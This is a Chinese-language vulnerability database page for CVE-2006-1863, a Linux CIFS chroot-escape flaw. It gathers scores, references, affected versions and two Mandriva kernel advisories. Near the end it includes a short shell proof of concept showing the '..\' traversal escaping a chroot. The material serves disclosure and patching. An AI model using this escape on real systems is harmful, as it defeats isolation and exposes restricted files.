CVE-2006-1863
CVSS2.1
发布时间 :2006-04-25 18:02:00
修订时间 :2013-08-03 01:41:19
NMCOPS    

[原文]Directory traversal vulnerability in CIFS in Linux 2.6.16 and earlier allows local users to escape chroot restrictions for an SMB-mounted filesystem via "..\\" sequences, a similar vulnerability to CVE-2006-1864.


[CNNVD]Linux Kernel CIFS chroot目录遍历漏洞(CNNVD-200604-444)

        Linux Kernel是开放源码操作系统Linux所使用的内核。
        Linux Kernel的CIFS加载文件系统中存在输入验证错误。本地攻击者可以利用"..\\"目录遍历序列绕过chroot限制,访问受限资源。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10383Directory traversal vulnerability in CIFS in Linux 2.6.16 and earlier allows local users to escape chroot restrictions for an SMB-mounted fi...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1863
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1863
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-444
(官方数据源) CNNVD

- 其它链接及资源

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189434
(PATCH)  CONFIRM  https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189434
http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=296034f7de8bdf111984ce1630ac598a9c94a253
(PATCH)  CONFIRM  http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=296034f7de8bdf111984ce1630ac598a9c94a253
http://www.vupen.com/english/advisories/2006/2554
(UNKNOWN)  VUPEN  ADV-2006-2554
http://www.vupen.com/english/advisories/2006/1542
(UNKNOWN)  VUPEN  ADV-2006-1542
http://www.osvdb.org/25068
(UNKNOWN)  OSVDB  25068
http://rhn.redhat.com/errata/RHBA-2007-0304.html
(UNKNOWN)  REDHAT  RHBA-2007-0304
http://xforce.iss.net/xforce/xfdb/26141
(UNKNOWN)  XF  kernel-cifs-directory-traversal(26141)
http://www.trustix.org/errata/2006/0024
(UNKNOWN)  TRUSTIX  2006-0024
http://www.securityfocus.com/bid/17742
(UNKNOWN)  BID  17742
http://www.novell.com/linux/security/advisories/2006-05-31.html
(UNKNOWN)  SUSE  SUSE-SA:2006:028
http://www.mandriva.com/security/advisories?name=MDKSA-2006:151
(UNKNOWN)  MANDRIVA  MDKSA-2006:151
http://www.mandriva.com/security/advisories?name=MDKSA-2006:150
(UNKNOWN)  MANDRIVA  MDKSA-2006:150
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.11
(UNKNOWN)  CONFIRM  http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.11
http://www.debian.org/security/2006/dsa-1103
(UNKNOWN)  DEBIAN  DSA-1103
http://secunia.com/advisories/21614
(UNKNOWN)  SECUNIA  21614
http://secunia.com/advisories/20914
(UNKNOWN)  SECUNIA  20914
http://secunia.com/advisories/20398
(UNKNOWN)  SECUNIA  20398
http://secunia.com/advisories/19868
(UNKNOWN)  SECUNIA  19868

- 漏洞信息

Linux Kernel CIFS chroot目录遍历漏洞
低危 路径遍历
2006-04-25 00:00:00 2006-04-30 00:00:00
本地  
        Linux Kernel是开放源码操作系统Linux所使用的内核。
        Linux Kernel的CIFS加载文件系统中存在输入验证错误。本地攻击者可以利用"..\\"目录遍历序列绕过chroot限制,访问受限资源。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Linux linux-2.6.16.11.tar.bz2
        http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.16.11.tar.bz2

- 漏洞信息 (F49475)

Mandriva Linux Security Advisory 2006.151 (PacketStormID:F49475)
2006-08-28 00:00:00
Mandriva  mandriva.com
advisory,kernel,vulnerability
linux,mandriva
CVE-2006-1066,CVE-2006-1863,CVE-2006-1864,CVE-2006-2934,CVE-2006-2935,CVE-2006-2936,CVE-2006-3468,CVE-2006-3745
[点击下载]

Mandriva Linux Security Advisory MDKSA-2006-151 - A number of vulnerabilities were discovered and corrected in the Linux 2.6 kernel.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:151
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : kernel
 Date    : August 25, 2006
 Affected: 2006.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 Prior to and including 2.6.16-rc2, when running on x86_64 systems with
 preemption enabled, local users can cause a DoS (oops) via multiple
 ptrace tasks that perform single steps (CVE-2006-1066).
 
 Prior to 2.6.16, a directory traversal vulnerability in CIFS could
 allow a local user to escape chroot restrictions for an SMB-mounted
 filesystem via "..\\" sequences (CVE-2006-1863).
 
 Prior to 2.6.16, a directory traversal vulnerability in smbfs could
 allow a local user to escape chroot restrictions for an SMB-mounted
 filesystem via "..\\" sequences (CVE-2006-1864).
 
 Prior to to 2.6.16.23, SCTP conntrack in netfilter allows remote
 attackers to cause a DoS (crash) via a packet without any chunks,
 causing a variable to contain an invalid value that is later used to
 dereference a pointer (CVE-2006-2934).
 
 The dvd_read_bca function in the DVD handling code assigns the wrong
 value to a length variable, which could allow local users to execute
 arbitrary code via a crafted USB storage device that triggers a buffer
 overflow (CVE-2006-2935).
 
 Prior to 2.6.17, the ftdi_sio driver could allow local users to cause
 a DoS (memory consumption) by writing more data to the serial port than
 the hardware can handle, causing the data to be queued (CVE-2006-2936).
 
 The 2.6 kernel, when using both NFS and EXT3, allowed remote attackers
 to cause a DoS (file system panic) via a crafted UDP packet with a V2
 lookup procedure that specifies a bad file handle (inode number),
 triggering an error and causing an exported directory to be remounted
 read-only (CVE-2006-3468).
 
 The 2.6 kernel's SCTP was found to cause system crashes and allow for
 the possibility of local privilege escalation due to a bug in the
 get_user_iov_size() function that doesn't properly handle overflow when
 calculating the length of iovec (CVE-2006-3745).
 
 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.
 
 In addition to these security fixes, other fixes have been included
 such as:
 
 - added support for new devices:
   o Testo products in usb-serial
   o ATI SB600 IDE
   o ULI M-1573 south Bridge
   o PATA and SATA support for nVidia MCP55, MCP61, MCP65, and AMD CS5536
   o Asus W6A motherboard in snd-hda-intel
   o bcm 5780
 - fixed ip_gre module unload OOPS
 - enabled opti621 driver for x86 and x86_64
 - fixed a local DoS introduced by an imcomplete fix for CVE-2006-2445
 - updated to Xen 3.0.1 with selected fixes
 - enable hugetlbfs
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1066
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1863
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1864
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2934
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2935
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2936
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3468
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3745
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 9b4811892823bfa6ddfa648f029ee500  2006.0/RPMS/kernel-2.6.12.25mdk-1-1mdk.i586.rpm
 27e6afeac2d98e07cd8a16d2ffa8de28  2006.0/RPMS/kernel-BOOT-2.6.12.25mdk-1-1mdk.i586.rpm
 dcd2a1843a5f56c286a0e6270c7b1d79  2006.0/RPMS/kernel-i586-up-1GB-2.6.12.25mdk-1-1mdk.i586.rpm
 477b78d6836d03484a58720f2137e506  2006.0/RPMS/kernel-i686-up-4GB-2.6.12.25mdk-1-1mdk.i586.rpm
 ab1f7540dbfd41f469f4931a710dbe95  2006.0/RPMS/kernel-smp-2.6.12.25mdk-1-1mdk.i586.rpm
 ed246f8b552bb26bb8e89c0c0842bbe9  2006.0/RPMS/kernel-source-2.6.12.25mdk-1-1mdk.i586.rpm
 acb15b08ed7f7d2ad3747c555a07b401  2006.0/RPMS/kernel-source-stripped-2.6.12.25mdk-1-1mdk.i586.rpm
 ede19a2f7dd7b715c58e9c61ee1c3359  2006.0/RPMS/kernel-xbox-2.6.12.25mdk-1-1mdk.i586.rpm
 848a9f9725f141077a34affb42088946  2006.0/RPMS/kernel-xen0-2.6.12.25mdk-1-1mdk.i586.rpm
 d280fd356d01831e6dbe5f0fc73c741b  2006.0/RPMS/kernel-xenU-2.6.12.25mdk-1-1mdk.i586.rpm
 c0a388efafe83a187a58d582ddf9cafb  2006.0/SRPMS/kernel-2.6.12.25mdk-1-1mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 54c6b69a3ce44d4dfb217f4b4f620293  x86_64/2006.0/RPMS/kernel-2.6.12.25mdk-1-1mdk.x86_64.rpm
 0eded734bf839d253c18d4849507a687  x86_64/2006.0/RPMS/kernel-BOOT-2.6.12.25mdk-1-1mdk.x86_64.rpm
 c379d55bcaee5070b46475b2e1cbce0a  x86_64/2006.0/RPMS/kernel-smp-2.6.12.25mdk-1-1mdk.x86_64.rpm
 2fad12f6ea68fdd1d000c2602f47a0a3  x86_64/2006.0/RPMS/kernel-source-2.6.12.25mdk-1-1mdk.x86_64.rpm
 1ae8c5f75d5660e511cfe2db62a02056  x86_64/2006.0/RPMS/kernel-source-stripped-2.6.12.25mdk-1-1mdk.x86_64.rpm
 160c2425b4be695feaafffdb59cc8fcd  x86_64/2006.0/RPMS/kernel-xen0-2.6.12.25mdk-1-1mdk.x86_64.rpm
 677a458c0eb70f9f8a5bd9553b96f589  x86_64/2006.0/RPMS/kernel-xenU-2.6.12.25mdk-1-1mdk.x86_64.rpm
 c0a388efafe83a187a58d582ddf9cafb  x86_64/2006.0/SRPMS/kernel-2.6.12.25mdk-1-1mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFE7xpfmqjQ0CJFipgRAio9AKDjb4g8obg5dkOccjQOlFQ6oeIKAQCgkNQ3
ZdXAs/f1g9RsGP1wVlrqg+U=
=TeRg
-----END PGP SIGNATURE-----

    

- 漏洞信息 (F49474)

Mandriva Linux Security Advisory 2006.150 (PacketStormID:F49474)
2006-08-28 00:00:00
Mandriva  mandriva.com
advisory,kernel,vulnerability
linux,mandriva
CVE-2006-0554,CVE-2006-0744,CVE-2006-1343,CVE-2006-1857,CVE-2006-1858,CVE-2006-1863,CVE-2006-1864,CVE-2006-2274,CVE-2006-2935,CVE-2006-2936,CVE-2006-3468,CVE-2006-3745
[点击下载]

Mandriva Linux Security Advisory MDKSA-2006-150 - A number of vulnerabilities were discovered and corrected in the Linux 2.6 kernel.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:150
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : kernel
 Date    : August 25, 2006
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 Prior to 2.6.15.5, the kerenl allowed local users to obtain sensitive
 information via a crafted XFS ftruncate call (CVE-2006-0554).
 
 Prior to 2.6.15.5, the kernel did not properly handle uncanonical
 return addresses on Intel EM64T CPUs causing the kernel exception
 handler to run on the user stack with the wrong GS (CVE-2006-0744).
 
 ip_conntrack_core.c in the 2.6 kernel, and possibly
 nf_conntrack_l3proto_ipv4.c did not clear sockaddr_in.sin_zero before
 returning IPv4 socket names from the getsockopt function with
 SO_ORIGINAL_DST, which could allow local users to obtain portions of
 potentially sensitive memory (CVE-2006-1343).
 
 Prior to 2.6.16.17, the a buffer overflow in SCTP in the kernel allowed
 remote attackers to cause a Denial of Service (crash) and possibly
 execute arbitrary code via a malformed HB-ACK chunk (CVE-2006-1857).
 
 Prior to 2.6.16.17, SCTP in the kernel allowed remote attackers to
 cause a DoS (crash) and possibly execute arbitrary code via a chunk
 length that is inconsistent with the actual length of provided
 parameters (CVE-2006-1858).
 
 Prior to 2.6.16, a directory traversal vulnerability in CIFS could
 allow a local user to escape chroot restrictions for an SMB-mounted
 filesystem via "..\\" sequences (CVE-2006-1863).
 
 Prior to 2.6.16, a directory traversal vulnerability in smbfs could
 allow a local user to escape chroot restrictions for an SMB-mounted
 filesystem via "..\\" sequences (CVE-2006-1864).
 
 Prior to 2.6.17, Linux SCTP allowed a remote attacker to cause a DoS
 (infinite recursion and crash) via a packet that contains two or more
 DATA fragments, which caused an skb pointer to refer back to itself
 when the full message is reassembled, leading to an infinite recursion
 in the sctp_skb_pull function (CVE-2006-2274).
 
 The dvd_read_bca function in the DVD handling code assigns the wrong
 value to a length variable, which could allow local users to execute
 arbitrary code via a crafted USB storage device that triggers a buffer
 overflow (CVE-2006-2935).
 
 Prior to 2.6.17, the ftdi_sio driver could allow local users to cause
 a DoS (memory consumption) by writing more data to the serial port than
 the hardware can handle, causing the data to be queued (CVE-2006-2936).
 
 The 2.6 kernel, when using both NFS and EXT3, allowed remote attackers
 to cause a DoS (file system panic) via a crafted UDP packet with a V2
 lookup procedure that specifies a bad file handle (inode number),
 triggering an error and causing an exported directory to be remounted
 read-only (CVE-2006-3468).
 
 The 2.6 kernel's SCTP was found to cause system crashes and allow for
 the possibility of local privilege escalation due to a bug in the
 get_user_iov_size() function that doesn't properly handle overflow when
 calculating the length of iovec (CVE-2006-3745).
 
 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0554
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0744
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1343
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1857
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1858
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1863
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1864
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2274
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2935
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2936
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3468
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3745
 _______________________________________________________________________
 
 Updated Packages:
 
 Corporate 3.0:
 9d14c43145beafb4e63fe8cae758d0f6  corporate/3.0/RPMS/kernel-2.6.3.35mdk-1-1mdk.i586.rpm
 e7331f51ed5cf4edee33efcb01f49243  corporate/3.0/RPMS/kernel-BOOT-2.6.3.35mdk-1-1mdk.i586.rpm
 dcb027450192d7d73f407f30d3e3e852  corporate/3.0/RPMS/kernel-enterprise-2.6.3.35mdk-1-1mdk.i586.rpm
 59f29ace5cc862c84cace5d046d6302e  corporate/3.0/RPMS/kernel-i686-up-4GB-2.6.3.35mdk-1-1mdk.i586.rpm
 6b062c5059587a927f31fea04fb91a3a  corporate/3.0/RPMS/kernel-p3-smp-64GB-2.6.3.35mdk-1-1mdk.i586.rpm
 744287198a20913bd38b1c1d37a68bd2  corporate/3.0/RPMS/kernel-secure-2.6.3.35mdk-1-1mdk.i586.rpm
 17780ad90f4989615baab5f115074f8a  corporate/3.0/RPMS/kernel-smp-2.6.3.35mdk-1-1mdk.i586.rpm
 4555bac09b7ce50d83b97c47af0b2724  corporate/3.0/RPMS/kernel-source-2.6.3-35mdk.i586.rpm
 7165754462cdfcd92c894f56623bc8b0  corporate/3.0/RPMS/kernel-source-stripped-2.6.3-35mdk.i586.rpm
 e59db387f0642f5293dc60283832557b  corporate/3.0/SRPMS/kernel-2.6.3.35mdk-1-1mdk.src.rpm

 Corporate 3.0/X86_64:
 918a70fe836d900b217f442b5208c779  x86_64/corporate/3.0/RPMS/kernel-2.6.3.35mdk-1-1mdk.x86_64.rpm
 dd1ea77b15bd07c75f5ab7caf00dbde0  x86_64/corporate/3.0/RPMS/kernel-BOOT-2.6.3.35mdk-1-1mdk.x86_64.rpm
 c8964849f4142c2c51c3ddd298513753  x86_64/corporate/3.0/RPMS/kernel-secure-2.6.3.35mdk-1-1mdk.x86_64.rpm
 7a98664c4ba5f0d50a500c1158a8fb08  x86_64/corporate/3.0/RPMS/kernel-smp-2.6.3.35mdk-1-1mdk.x86_64.rpm
 3c4d5ca4f7a1a91d99fc182e499c9e76  x86_64/corporate/3.0/RPMS/kernel-source-2.6.3-35mdk.x86_64.rpm
 a25c6705ba2b70c85c1c86e68cb0d3cd  x86_64/corporate/3.0/RPMS/kernel-source-stripped-2.6.3-35mdk.x86_64.rpm
 e59db387f0642f5293dc60283832557b  x86_64/corporate/3.0/SRPMS/kernel-2.6.3.35mdk-1-1mdk.src.rpm

 Multi Network Firewall 2.0:
 5cab4be7c19a67689f33f01de208879e  mnf/2.0/RPMS/kernel-2.6.3.35mdk-1-1mdk.i586.rpm
 ee1db88c9010b3a1af0f5ea93ce86505  mnf/2.0/RPMS/kernel-i686-up-4GB-2.6.3.35mdk-1-1mdk.i586.rpm
 0e3618eec1dcb5bca817ecec7e912836  mnf/2.0/RPMS/kernel-p3-smp-64GB-2.6.3.35mdk-1-1mdk.i586.rpm
 ded09245567203340c86b3ddacf21b3a  mnf/2.0/RPMS/kernel-secure-2.6.3.35mdk-1-1mdk.i586.rpm
 7efdc84f2748f1c2237a72ef94d90b31  mnf/2.0/RPMS/kernel-smp-2.6.3.35mdk-1-1mdk.i586.rpm
 d12744fdab6bf6606ed13fae69b51f50  mnf/2.0/SRPMS/kernel-2.6.3.35mdk-1-1mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFE7xa9mqjQ0CJFipgRAsAAAKC/kOcYUfcUldfx8MGy87CHigyjSgCeJ/43
JsyWup/H/+NRqjHU1SGHaGc=
=8KyZ
-----END PGP SIGNATURE-----

    

- 漏洞信息

25068
Linux Kernel CIFS SMB Mount Traversal chroot Restriction Bypass
Local Access Required Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

The Linux Kernel contains a flaw that may allow a malicious user to escape a chroot environment. The issue is triggered when a user attempts to change to a working directory outside a chroot environment in a CIFS file system using a double backslash, e.g. 'cd ..\\'. It is possible that the flaw may allow unauthorised access to file system resources, resulting in a loss of confidentiality and/or integrity.

- 时间线

2006-04-19 Unknow
2006-04-19 Unknow

- 解决方案

Upgrade to version 2.6.16.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Linux Kernel CIFS CHRoot Security Restriction Bypass Vulnerability
Input Validation Error 17742
No Yes
2006-04-28 12:00:00 2007-01-18 02:42:00
Marcel Holtmann is credited with the discovery of this vulnerability.

- 受影响的程序版本

Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
S.u.S.E. Linux Enterprise Server 9
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .8
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .5
Linux kernel 2.6.16 .4
Linux kernel 2.6.16 .3
Linux kernel 2.6.16 .2
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.15 .6
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc6
Linux kernel 2.6.15 -rc5
Linux kernel 2.6.15 -rc4
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
+ Red Hat Fedora Core4
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
+ Red Hat Fedora Core3
+ Red Hat Fedora Core2
+ Trustix Secure Linux 3.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.6.15.5
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Linux kernel 2.6.16 .11

- 不受影响的程序版本

Linux kernel 2.6.16 .11

- 漏洞讨论

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data.

The problem affects chroot inside of an SMB-mounted filesystem ('cifs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.

- 漏洞利用

This issue can be exploited via normal system commands.

The following proof of concept is available:
root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
<list of files from parent>

- 解决方案

Please see the referenced advisories for information on obtaining updates to this issue.


Linux kernel 2.6 -test6

Linux kernel 2.6 -test4

Linux kernel 2.6 -test2

Linux kernel 2.6 -test9-CVS

Linux kernel 2.6 -test7

Linux kernel 2.6 -test9

Linux kernel 2.6 -test10

Linux kernel 2.6 -test11

Linux kernel 2.6.1 -rc2

Linux kernel 2.6.1

Linux kernel 2.6.10 rc2

Linux kernel 2.6.10

Linux kernel 2.6.11 -rc3

Linux kernel 2.6.11 .11

Linux kernel 2.6.11 .7

Linux kernel 2.6.11

Linux kernel 2.6.11 .6

Linux kernel 2.6.12 .4

Linux kernel 2.6.12 .1

Linux kernel 2.6.12 -rc4

Linux kernel 2.6.12 .2

Linux kernel 2.6.12 -rc1

Linux kernel 2.6.12 .3

Linux kernel 2.6.13 -rc4

Linux kernel 2.6.13 .3

Linux kernel 2.6.13

Linux kernel 2.6.13 -rc7

Linux kernel 2.6.13 -rc1

Linux kernel 2.6.14 .4

Linux kernel 2.6.14 .1

Linux kernel 2.6.14 .3

Linux kernel 2.6.14 -rc2

Linux kernel 2.6.14 .5

Linux kernel 2.6.14 -rc3

Linux kernel 2.6.15 -rc6

Linux kernel 2.6.15

Linux kernel 2.6.15 -rc1

Linux kernel 2.6.15 -rc3

Linux kernel 2.6.15 .4

Linux kernel 2.6.15 -rc4

Linux kernel 2.6.15 .6

Linux kernel 2.6.16 .3

Linux kernel 2.6.16 .9

Linux kernel 2.6.16 .5

Linux kernel 2.6.16 .1

Linux kernel 2.6.16 -rc1

Linux kernel 2.6.16

Linux kernel 2.6.16 .2

Linux kernel 2.6.16 .8

Linux kernel 2.6.2

Linux kernel 2.6.3

Linux kernel 2.6.4

Linux kernel 2.6.6 rc1

Linux kernel 2.6.6

Linux kernel 2.6.7

Linux kernel 2.6.8 rc2

Linux kernel 2.6.8 rc1

Linux kernel 2.6.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站